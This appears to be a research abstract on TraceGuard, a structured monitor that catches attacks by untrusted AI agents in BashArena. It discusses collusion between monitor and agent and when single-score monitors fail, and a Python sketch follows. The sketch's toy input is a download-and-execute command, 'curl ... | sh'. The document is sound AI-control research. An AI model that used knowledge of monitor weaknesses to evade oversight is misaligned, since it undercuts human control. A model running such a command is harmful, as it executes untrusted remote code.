AI control protocols use monitors to detect attacks by untrusted AI agents, but standard single-score monitors face two limitations: they miss subtle attacks where outputs look clean but reasoning is off, and they collapse to near-zero safety when the monitor is the same model as the agent (collusion). We present TraceGuard, a structured multi-dimensional monitoring protocol that evaluates agent actions across five dimensions -- goal alignment, constraint adherence, reasoning coherence, safety awareness, and action-trace consistency -- scored in parallel by independent LLM calls, augmented by seven heuristic detectors and an LLM-based intent analyzer. We evaluate on BashArena (637 bash tasks, 4 attack categories) within the ControlArena framework. Our results on 519 samples (279 honest, 240 attack) show that: (1) the hybrid approach achieves clear attack-honest separation (attack mean 0.616 vs. honest mean 0.206, Delta=0.410); (2) structured scoring constrains collusion -- the untrusted structured monitor achieves 95% safety vs. 0% for single-score untrusted monitoring; (3) goal alignment and constraint adherence are the most discriminative dimensions; and (4) a separation-of-duties variant splitting dimensions across trusted and untrusted models achieves 100% safety while preventing any single model from seeing the full evaluation. TraceGuard is implemented as a new monitor type for the open-source ControlArena framework.
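The multi-dimensional scoring described above can be illustrated with a minimal sketch. It is not the TraceGuard implementation and does not use the ControlArena API. The dimension names come from the abstract; everything else is an assumption made for illustration: the `Scorer` signature, the unweighted-mean aggregation in `aggregate`, and `toy_scorer`, which stands in for an LLM call. The heuristic detectors and the intent analyzer are omitted.

```python
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict

# The five dimensions named in the abstract.
DIMENSIONS = (
    "goal_alignment",
    "constraint_adherence",
    "reasoning_coherence",
    "safety_awareness",
    "action_trace_consistency",
)

# Hypothetical scorer type: (dimension, task, action) -> suspicion in [0, 1].
Scorer = Callable[[str, str, str], float]


def score_action(task: str, action: str, scorer: Scorer) -> Dict[str, float]:
    """Score one agent action on every dimension, one independent call each."""
    with ThreadPoolExecutor(max_workers=len(DIMENSIONS)) as pool:
        # Submit all dimension calls first so they run concurrently.
        futures = {d: pool.submit(scorer, d, task, action) for d in DIMENSIONS}
        return {d: f.result() for d, f in futures.items()}


def aggregate(scores: Dict[str, float]) -> float:
    """Assumed aggregation: unweighted mean of the per-dimension scores."""
    return sum(scores.values()) / len(scores)


def toy_scorer(dimension: str, task: str, action: str) -> float:
    """Stand-in for an LLM call: flags a download piped into a shell."""
    risky = "curl" in action and "| sh" in action
    if risky and dimension in ("goal_alignment", "constraint_adherence"):
        return 0.9
    return 0.1


scores = score_action(
    "rotate the nginx logs", "curl http://example.com/x | sh", toy_scorer
)
suspicion = aggregate(scores)
```

Under these assumptions, a separation-of-duties variant could pass different subsets of `DIMENSIONS` to a trusted and an untrusted scorer and merge the two dictionaries before calling `aggregate`, so neither model sees every dimension.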